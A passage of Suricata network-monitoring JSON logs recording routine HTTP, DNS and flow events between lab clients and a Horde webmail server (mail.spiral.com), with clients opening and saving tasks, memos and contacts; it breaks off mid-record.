{"timestamp":"2020-02-29T00:14:30.000335+0000","flow_id":1016531461094710,"event_type":"flow","src_ip":"192.168.10.130","src_port":34818,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1165,"bytes_toclient":643,"start":"2020-02-29T00:13:24.736566+0000","end":"2020-02-29T00:13:29.882017+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:33.779815+0000","flow_id":1080320319612926,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34828,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=CzzvouuXL90PtKLh7taEoDK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8792},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":35365,"tx_id":0}} {"timestamp":"2020-02-29T00:14:34.700227+0000","flow_id":959704753418051,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50181,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:34.701748+0000","flow_id":658082085123380,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33640,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36121,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:34.808864+0000","flow_id":959704753418051,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39423,"proto":"UDP","dns":{"type":"answer","id":50181,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:34.808864+0000","flow_id":959704753418051,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39423,"proto":"UDP","dns":{"type":"answer","id":50181,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:34.809817+0000","flow_id":658082085123380,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33640,"proto":"UDP","dns":{"type":"answer","id":36121,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:34.809817+0000","flow_id":658082085123380,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33640,"proto":"UDP","dns":{"type":"answer","id":36121,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:34.872848+0000","flow_id":54888288126643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752}} {"timestamp":"2020-02-29T00:14:34.914303+0000","flow_id":512302305152088,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34830,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=CzzvouuXL90PtKLh7taEoDK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:14:34.924308+0000","flow_id":209077614025364,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45522,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44440,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:35.033032+0000","flow_id":209077614025364,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45522,"proto":"UDP","dns":{"type":"answer","id":44440,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:35.033032+0000","flow_id":209077614025364,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45522,"proto":"UDP","dns":{"type":"answer","id":44440,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:36.000132+0000","event_type":"stats","stats":{"uptime":14528,"capture":{"kernel_packets":135658,"kernel_drops":0},"decoder":{"pkts":135661,"bytes":93416146,"invalid":187,"ipv4":134156,"ipv6":8,"ethernet":135661,"raw":0,"null":0,"sll":0,"tcp":128830,"udp":5124,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2778,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2794,"synack":2785,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1817,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2341,"failed_udp":112},"tx":{"http":4673,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2421}},"flow_mgr":{"closed_pruned":2762,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23140,"memcap_state":0,"memcap_global":0},"http":{"memuse":53758,"memcap":0}}} {"timestamp":"2020-02-29T00:14:37.000629+0000","flow_id":1477849603888713,"event_type":"flow","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1912,"bytes_toclient":6507,"start":"2020-02-29T00:13:31.382537+0000","end":"2020-02-29T00:13:36.778747+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:39.874014+0000","flow_id":54888288126643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52756,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:14:39.946436+0000","flow_id":479196697555204,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45154,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12066,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:40.054421+0000","flow_id":479196697555204,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45154,"proto":"UDP","dns":{"type":"answer","id":12066,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:40.054421+0000","flow_id":479196697555204,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45154,"proto":"UDP","dns":{"type":"answer","id":12066,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:40.178979+0000","flow_id":1209336842897935,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34832,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6755}} {"timestamp":"2020-02-29T00:14:42.000716+0000","flow_id":653855817992358,"event_type":"flow","src_ip":"192.168.10.122","src_port":49092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:40.919718+0000","end":"2020-02-29T00:09:41.028314+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:43.000194+0000","event_type":"stats","stats":{"uptime":14535,"capture":{"kernel_packets":135716,"kernel_drops":0},"decoder":{"pkts":135727,"bytes":93446988,"invalid":188,"ipv4":134222,"ipv6":8,"ethernet":135727,"raw":0,"null":0,"sll":0,"tcp":128887,"udp":5132,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2781,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2797,"synack":2788,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1820,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2345,"failed_udp":112},"tx":{"http":4676,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2425}},"flow_mgr":{"closed_pruned":2763,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23140,"memcap_state":0,"memcap_global":0},"http":{"memuse":53816,"memcap":0}}} {"timestamp":"2020-02-29T00:14:44.210095+0000","flow_id":1926025151001775,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47129,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17709,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:44.318670+0000","flow_id":1926025151001775,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47129,"proto":"UDP","dns":{"type":"answer","id":17709,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:44.318670+0000","flow_id":1926025151001775,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47129,"proto":"UDP","dns":{"type":"answer","id":17709,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:44.338503+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:14:44.338503+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":18,"tx_id":0}} {"timestamp":"2020-02-29T00:14:45.000745+0000","flow_id":1943479878474362,"event_type":"flow","src_ip":"192.168.10.122","src_port":41241,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:44.645754+0000","end":"2020-02-29T00:09:44.754265+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:45.179858+0000","flow_id":1209336842897935,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34832,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6755},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":33151,"tx_id":0}} {"timestamp":"2020-02-29T00:14:46.043430+0000","flow_id":345417056692646,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41179,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41844,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:46.152344+0000","flow_id":345417056692646,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41179,"proto":"UDP","dns":{"type":"answer","id":41844,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:46.152344+0000","flow_id":345417056692646,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41179,"proto":"UDP","dns":{"type":"answer","id":41844,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:46.216976+0000","flow_id":1918758066486106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34834,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3979}} {"timestamp":"2020-02-29T00:14:47.000556+0000","flow_id":489251210174079,"event_type":"flow","src_ip":"192.168.10.130","src_port":34814,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":1295,"bytes_toclient":8193,"start":"2020-02-29T00:13:10.761471+0000","end":"2020-02-29T00:13:46.260707+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:49.035557+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52758,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:14:49.044164+0000","flow_id":7712368340100,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44069,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15118,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:49.152103+0000","flow_id":7712368340100,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44069,"proto":"UDP","dns":{"type":"answer","id":15118,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:49.152103+0000","flow_id":7712368340100,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44069,"proto":"UDP","dns":{"type":"answer","id":15118,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:49.301564+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:14:49.301564+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":198,"tx_id":1}} {"timestamp":"2020-02-29T00:14:49.316701+0000","flow_id":2108866204128541,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51339,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25357,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:49.421564+0000","flow_id":2108866204128541,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51339,"proto":"UDP","dns":{"type":"answer","id":25357,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:49.421564+0000","flow_id":2108866204128541,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51339,"proto":"UDP","dns":{"type":"answer","id":25357,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:49.540560+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5677}} {"timestamp":"2020-02-29T00:14:50.000198+0000","event_type":"stats","stats":{"uptime":14542,"capture":{"kernel_packets":135743,"kernel_drops":0},"decoder":{"pkts":135756,"bytes":93455039,"invalid":188,"ipv4":134249,"ipv6":8,"ethernet":135756,"raw":0,"null":0,"sll":0,"tcp":128910,"udp":5136,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2783,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2799,"synack":2790,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1822,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2347,"failed_udp":112},"tx":{"http":4678,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2427}},"flow_mgr":{"closed_pruned":2764,"new_pruned":15,"est_pruned":2389,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24131,"memcap_state":0,"memcap_global":0},"http":{"memuse":105616,"memcap":0}}} {"timestamp":"2020-02-29T00:14:50.001602+0000","flow_id":1254571419460852,"event_type":"flow","src_ip":"192.168.10.122","src_port":45436,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:49.091380+0000","end":"2020-02-29T00:09:49.199155+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:51.217864+0000","flow_id":1918758066486106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34834,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3979},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19145,"tx_id":0}} {"timestamp":"2020-02-29T00:14:52.000425+0000","flow_id":36578839428506,"event_type":"flow","src_ip":"192.168.10.130","src_port":34822,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":1297,"bytes_toclient":8197,"start":"2020-02-29T00:13:46.261530+0000","end":"2020-02-29T00:13:51.621886+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:52.729829+0000","flow_id":1936470511985381,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49156,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":872,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:52.835054+0000","flow_id":1936470511985381,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49156,"proto":"UDP","dns":{"type":"answer","id":872,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:52.835054+0000","flow_id":1936470511985381,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49156,"proto":"UDP","dns":{"type":"answer","id":872,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:52.981007+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34836,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 